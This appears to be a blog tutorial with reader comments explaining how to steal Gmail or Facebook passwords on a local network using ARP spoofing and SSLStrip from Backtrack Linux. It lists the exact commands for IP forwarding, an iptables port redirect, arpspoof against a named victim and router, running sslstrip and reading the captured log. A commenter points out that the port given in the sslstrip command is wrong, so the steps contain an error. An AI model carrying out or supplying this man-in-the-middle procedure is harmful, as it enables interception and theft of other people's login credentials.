RSS

Steal credentials in LAN – SSLStrip

May 24

SSLStrip can be used to steal gmail, facebook… (any https site) credentials in LAN. Backtrack comes with a pre-installed SSLStrip.

Below steps explain the usage of SSLStrip to steal the credentials.
Attacker: Backtrack 4 linux machine
Victim: windows xp machine  

On Backtrack 4 terminal,

  • echo 1 > /proc/sys/net/ipv4/ip_forward
  • iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000
  • arpspoof -i eth0 -t victimip routerip

On other terminal:

  • sslstrip -l 1000

If you are using Backtrack 5, then do the following to start SSLStrip.

  • Go to start->info gathering->web app tools->ssl analysys->sslstrip
  • chmod +x sslstrip.py
  • Python sslstrip.py -l 1000

Now in windows xp machine, open a browser (IE). Type gmail and hit cntrl+enter.

Type username and password to log into your gmail.

By this time SSLStrip captures the credentials and stores it in sslstrip.log file. To view the log

On backtrack terminal:

  • cat sslstrip.log
To understand it in a better way watch this video –
 

Posted by on May 24, 2011 in Backtrack

9 Comments

Tags: , , , , , ,

9 responses to “Steal credentials in LAN – SSLStrip

  1. Dan

    April 4, 2012 at 7:09 pm

    I presume you have to connect to the network first, what would the commands for that be?

     
    • Satish B

      April 4, 2012 at 11:05 pm

      Run the below command on terminal to connect network-

      > ifconfig en0 up

       
      • Dan

        April 4, 2012 at 11:18 pm

        so I run that command changing en0 to whatever my wireless adapter happens to be does it then ask for ssid and passphrase?

         
        • Satish B

          April 6, 2012 at 6:01 am

          The simplest way to connect to WI-FI network from backtrack is,
          Navigate to Applications->Internet->Wicd Network Manager, it will list out all the Wi-Fi connections available. Click on and connect to your network.

           
    • zcat

      June 26, 2013 at 1:13 am

      ERROR in port number of sslstrip command
      is 1000
      should be 10000

       
  2. Nikit Saraf

    April 14, 2012 at 12:58 pm

    Would this hack work on a windows 7 machine???

     
  3. Sebarina

    January 18, 2013 at 4:32 pm

    Can this method attack ssl3?

     

Leave a Reply

Your email address will not be published. Required fields are marked *